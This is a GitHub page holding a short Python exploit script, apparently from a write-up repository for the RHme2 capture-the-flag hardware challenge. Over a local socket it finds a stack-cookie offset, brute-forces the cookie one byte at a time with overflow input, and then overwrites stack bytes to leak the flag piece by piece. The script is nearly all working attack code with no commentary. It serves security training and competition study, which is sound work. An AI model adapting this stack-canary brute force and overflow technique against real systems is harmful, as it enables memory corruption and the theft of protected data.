rhme2_writeups/exploit/photo.py at master · gijsh/rhme2_writeups · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import string
from sock import Sock
s = Sock('127.0.0.1',1235)
l = 0
s.read_until('[2] Memory management\r\n')
s.send('2\r')
r = s.read_until('[2] Memory management\r\n')
used = int(r.split('\r\n')[1].split()[-2])
i = 4088 - used
print "Stack cookie is at offset: %s" % i

cookie = ''
for x in range(60,256):
    s.send('1\r')
    s.read_until('Token can only contain the characters [A-Z/a-z/0-9]\r\n\r\n')
    if not cookie:
        d = 'A'*i
        s.send(d + cookie + chr(x) + '\r')
        o = s.read_line()
        if 'Welcome' in o:
            cookie += chr(x)
            print "Cookie found: ", repr(cookie)
            break
    r = s.read_until('[2] Memory management\r\n')

d = (string.uppercase * 10)[:i]
flag = ''
for x in range(4):
    v = 0xcf + x*8
    s.send('1\r')
    s.read_until('Token can only contain the characters [A-Z/a-z/0-9]\r\n\r\n')
    s.send(d + cookie + chr(8) + chr(0xff) + chr(v) + '\r')
    r = s.read_until('[2] Memory management\r\n')
    flag += r.split()[1]
    print "FLAG:", flag